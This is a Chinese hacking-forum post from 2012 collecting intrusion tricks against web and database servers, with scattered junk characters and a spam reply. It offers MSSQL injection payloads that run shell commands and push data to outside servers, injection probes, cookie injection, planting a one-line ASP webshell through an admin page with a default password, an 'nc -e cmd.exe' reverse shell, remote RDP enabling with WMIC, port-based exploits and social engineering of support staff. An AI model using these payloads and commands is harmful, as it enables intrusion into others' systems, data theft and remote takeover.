找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3187|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
SA点数据库分离技术相关
2 F8 d) T3 ~1 @3 F
5 Z; N2 S  @+ B* C  y: C  |, g; r' o# D. L
SA点数据库分离搞法+语句:" J$ e* R& r+ }2 V
2 ^! D# e& D( \- @, y
注射点不显错,执行下面三条语句页面都返回正常。5 R  I- Q) W7 K, Y
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
: x7 j: a9 Q' r* cand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')+ L! X6 g3 F/ ~5 m
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')0 E) d+ Z" X0 @  I- F
可以列目录,判断系统为2000,web与数据库分离
  d2 B9 F; K1 R遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
1 J, l- X+ j' p: @) e1 n' ~在注射点上执行
) v) g- c* ~& h, Rdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--" `0 q6 b9 r( u' G. f
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
/ H7 `+ m- R6 p2 X还有我用NC监听得其他端口都没有得到IP。& o- [; s! A$ `, U$ ^5 r: i2 e& X
# [- Q9 G" g" t; D# b6 u
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
8 d1 ?* r; g, |  t: L2 ]'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--$ C" F5 E8 X2 K

5 Y  h# J5 ]+ Y- X;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
$ q0 M: X' U6 l8 K; B* y$ C! a
7 Z/ k; b" j, f7 y3 Y; G7 S现在就猜想是不是数据库是内网而且不能连外网。
7 D) ^( D; N) L* t3 i* T# ~1 m5 r+ L

) d0 ?% E9 R3 V( W1 s2 M1 kaccess导出txt文本代码
% @' ]) o$ f, ^8 NSELECT * into [test.txt] in 'd:\web\' 'text;' from admin
" j3 d% I: J$ E' l
5 |2 ^: F/ E5 ^% T. p2 ~) B; b' ^: \8 t3 h( Z3 A
% D- a& t, Z7 j& P* [& ~/ J
自动跳转到指定网站代码头
# {' v! u' [* t# U) S<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
) H/ \& [; A9 O' i) a/ V5 N! r
' ^& ^' x9 Y3 b- A+ A$ d9 a1 W; R$ @! G+ I4 D& P& R
入侵java or jsp站点时默认配置文件路径:
& n3 D. X& a# C4 A+ {3 p) s: k8 t* T4 \\web-inf\web.xml6 u% ]" A4 M7 ^
tomcat下的配置文件位置:
9 ^( k  A/ P9 q. _* |\conf\server.xml            (前面加上tomcat路径)! E4 v8 O0 s& T
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
+ U% u* ~# ]2 O# F+ M0 }5 N' J1 g
% F" d+ P2 V% a4 n  P4 _% Z% \! S8 C9 y: l( O& j

- c+ U+ ?! x5 [2 V! [7 F检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
' a% o: f$ w) D) R-1%235 v4 D+ q, t  d0 F& C) G1 A) a+ V" M
> / V2 _+ o8 N' k* k5 }2 a8 e
<; ?4 w1 i) o7 p6 N+ @4 Z
1'+or+'1'='1
5 p( m8 M+ r1 b8 X3 ~& S0 y+ u! xid=8%bf
, F9 ^7 u; H0 o* X% h" d; c7 q2 c" o/ S
全新注入点检测试法:9 p3 M. B( Y# F
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
" q7 e9 X9 Z, p+ \* |1 P1 c6 I/ l; z) a+ Y
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
' Y0 j0 Y0 B4 t. T, l; ]* S: s% ?+ M$ H+ E$ P. g
搜索型注入判断方法:2 z0 t* i/ t- o& N( |
北京%' and '1'='1' and '%'='
5 D3 e" u$ Q$ z' s北京%' and '1'='2' and '%'='4 G3 Y* @: l7 W" c5 r% T4 F! D
4 a5 g! S# {7 ?3 j0 H) V
) b& }6 S# ~- c& S) ], m
COOKIES注入:: H+ @% b1 j/ V% Q7 T  }
! f7 \! W! z" H' W# h0 |
javascript:alert(document.cookie="id="+escape("51 and 1=1"));
, g+ F7 H; [3 A) g
1 T$ B7 ]4 Q+ Q' Q: P& ]" j3 O2000专业版查看本地登录用户命令:' p7 v, O3 ~. i% Z( C, G6 B7 O" ^3 u
net config workstation# r' Y, C) @! i% n: Q" e, p
6 g1 h! h5 x: j: W/ ^

- z& S% j# w1 y& c% ^3 N( o2003下查看ipsec配置和默认防火墙配置命令:
( _6 ^$ a/ }/ E7 R5 Z3 q* Knetsh firewall show config$ |0 f( H  {- \' A8 k
netsh ipsec static show all9 o' P* d2 {* A' M3 Q& {4 D9 _

0 M6 U+ ?3 N  b1 R, \- {  G, V不指派指定策略命令:
8 H1 C# W5 b' v; M) hnetsh ipsec static set policy name=test assign=n  (test是不指派的策略名)# L" H) r/ x% I$ c) O+ [5 H
netsh ipsec static show policy all  显示策略名
/ r* _1 |/ O( q9 P- W
0 E) N: F9 f- \$ k2 Z, u$ y3 u  y) y7 x- k# E
猜管理员后台小技巧:9 `2 z. I; m& s5 R( g( ?3 r5 M
admin/left.asp & U: f- f0 ~% w$ W' v: z( @* A
admin/main.asp
. G! o$ _- o- P# Q2 r; G: e, Ladmin/top.asp. k( g  S' {4 e
admin/admin.asp
" d' l9 v1 H1 f. W3 B! ]' ^会现出菜单导航,然后迅雷下载全部链接
' o8 X* [7 ^$ ^9 g
9 ^8 h& b1 M* N3 p2 H$ @" \
$ M) R" N, ]1 w$ X8 Q社会工程学:( }. o7 C  U! H
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人, q5 G* R& a7 v, [8 w  L
然后去骗客服
' [+ `, J0 o# i0 b9 Y1 f. Z/ L# o
$ s0 n9 p) y( m1 d% f2 d# |( V7 q# z( O$ P
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
1 o5 Z) i! |8 [, S查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
2 p- m& e2 _' Y$ e  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。& i. d1 |2 @+ C7 _% x3 m
- h7 F: v1 W9 C$ Z8 p( Y7 @* {

4 V0 u& v' {, W: T% C" n" t7 G( U$ i- G
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
/ W# ]% J3 }/ n& ?8 W! K1 Z" i; {# O/ {0 X) |

# B* B- s$ t. W7 Q+ L% z+ o) y3 c: b
/ j( D) U5 i/ E  ?CMD加密注册表位置. k/ K  Y; [" C( K' q
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
. o% ?" a! V- pAutoRun2 ^! e: E' P& p. O* G; {/ E

1 d! t6 ]% a3 i0 }" _(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
# K4 W$ n: O# g6 VAutoRun& F- f7 l" X" u2 s2 ^3 \
/ Z$ s1 Q3 N6 T; S3 i3 R6 L! h0 d) M
- P$ @8 [9 i* y; [" O" w
在找注入时搜索Hidden,把他改成test
2 k) X  p/ g' v+ I
) i: l" a5 U6 G1 f. m; H) f0 T" H  `- n8 u& Q
( [/ _, O' L0 u$ U
mstsc /v:IP /console 4 c! r* ^3 Q' f

1 C8 l9 ^2 Z! F+ ?' F8 \) o1 X4 e. [  e* t/ T( [' e7 z
一句话开3389:
3 c1 x. @6 {" O6 F) ]2 i5 b# @# C$ d  B8 n3 @
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  
8 w( e1 @. i) l( q9 }1 P开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.( S$ M* u/ d9 W  I* Y- W
" k# L5 d3 i( d) [; ^

" y& z; e3 w% R, M知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:) `' i3 d' {9 k: G+ N7 s
Insert into admin(user,pwd) values('test','test')
- P& w, r8 v/ g, [# C1 [; _* d
: P  J8 k" p9 L2 u
/ O) H5 t+ v5 r0 b$ qNC反弹
2 Q4 W) Z9 d. u  v) w( y3 u+ |先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
% O/ I/ z7 F. _$ U1 {" b然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
( V5 J9 {$ U1 a" Q( d  [0 E  c0 `8 b+ h5 W% \8 d

% ~; Y8 O. I4 F在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
" r  u% s0 P. `; w
2 z' z! w* [7 [- j, [! z' r. N! a有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
; S8 w/ S% ?  R$ k- D/ @例如:0 K$ m' }! ]; f1 Q% P4 Y- b
subst k: d:\www\ 用d盘www目录替代k盘
' K; J1 c6 P% x, p8 O) I0 D# ksubst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表